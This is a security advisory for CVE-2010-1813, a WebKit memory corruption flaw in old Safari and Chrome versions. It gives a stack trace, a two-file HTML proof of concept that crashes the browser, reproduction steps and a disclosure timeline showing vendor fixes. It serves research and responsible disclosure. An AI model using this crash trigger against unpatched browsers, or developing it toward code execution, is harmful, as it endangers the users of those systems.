TITLE: WEBKIT (APPLE SAFARI < 4.1.2/5.0.2 & GOOGLE CHROME < 5.0.375.125) MEMORY CORRUPTION VULNERABILITY
TESTED OS: WINDOWS XP SP3
SEVERITY: HIGH
CVE-NUMBER: CVE-2010-1813
DISCOVERED DATE: 2010-06-29
FIXED DATE: GOOGLE CHROME (2010-07-26) & APPLE SAFARI (2010-09-08)
FIXED VERSIONS: GOOGLE CHROME 5.0.375.125 & APPLE SAFARI 4.1.2/5.0.2
DISCOVERED BY: JOSE A. VAZQUEZ
======ABOUT APPLICATION======
"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version
of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and
JavaScript code began as a branch of the KHTML and KJS libraries from KDE..." copied from http://webkit.org/
======DESCRIPTION======
A memory corruption vulnerability was confirmed by Chromium Security Team. Original stacktrace showed a null ptr
dereference, but some pointers were also corrupted.
Stacktrace (using Chrome symbols):
WebCore::RenderObject::containingBlock() Line 597
WebCore::RenderBlock::paintContinuationOutlines() Line 2344
WebCore::RenderBlock::paintObject() Line 2232
WebCore::RenderBlock::paint() Line 1980
WebCore::RenderLayer::paintLayer() Line 2447
WebCore::RenderLayer::paintList() Line 2499
WebCore::RenderLayer::paintLayer() Line 2468
WebCore::RenderLayer::paint() Line 2252
WebCore::FrameView::paintContents() Line 1943
WebCore::ScrollView::paint() Line 797
WebCore::RenderWidget::paint() Line 281
WebCore::InlineBox::paint() Line 180
WebCore::InlineFlowBox::paint() Line 682
WebCore::RootInlineBox::paint() Line 167
WebCore::RenderLineBoxList::paint() Line 219
WebCore::RenderBlock::paintContents() Line 2090
WebCore::RenderBlock::paintObject() Line 2199
WebCore::RenderBlock::paint() Line 1980
WebCore::RenderBlock::paintChildren() Line 2127
WebCore::RenderBlock::paintContents() Line 2092
WebCore::RenderBlock::paintObject() Line 2199
WebCore::RenderBlock::paint() Line 1980
WebCore::RenderLayer::paintLayer() Line 2445
WebCore::RenderLayer::paintList() Line 2499
WebCore::RenderLayer::paintLayer() Line 2468
WebCore::RenderLayer::paint() Line 2252
WebCore::FrameView::paintContents() Line 1943
WebCore::ScrollView::paint() Line 797
WebKit::WebFrameImpl::paintWithContext() Line 1795
WebKit::WebFrameImpl::paint() Line 1818
WebKit::WebViewImpl::paint() Line 979
RenderWidget::PaintRect() Line 390
RenderWidget::DoDeferredUpdate() Line 501
RenderWidget::CallDoDeferredUpdate() Line 428
======PROOF OF CONCEPT======
File 1.html:
<meta http-equiv="refresh" content="1;URL=1.html" >
<iframe src="2.html"></iframe>
File 2.html:
<dialog style='position:relative'>
<h style='outline-style:auto'>X<div></div></h>
</dialog>
======STEPS TO REPRODUCE======
1.- Upload 1.html and 2.html to your server.
2.- Open file 1.html with vulnerable app.
-Google Chrome:
3.- Wait for a while, then, crash is got (sad-tab).
-Apple Safari:
3.- Wait for a while, if crash is not got, use Ctrl+T to trigger it.
======REFERENCES======
[ref-1] -> https://bugs.webkit.org/show_bug.cgi?id=41373
[ref-2] -> http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html
[ref-3] -> http://support.apple.com/kb/HT4334
[ref-4] -> http://spa-s3c.blogspot.com/2010/09/full-responsible-disclosurewebkit-apple.html
======DISCLOSURE TIMELINE======
Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)
[2010-06-29] => Posted new issue in Chromium Project (with pocs).
[2010-06-29] => Chromium confirmed memory corruption and opened new webkit bug.
[2010-07-26] => Chromium released new fix (Google Chrome 5.0.375.125).
[2010-09-08] => Apple released new fix (Apple Safari 4.1.2/5.0.2).
[2010-09-10] => Public disclosure.
======CREDITS=======
Jose Antonio Vazquez Gonzalez,
Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum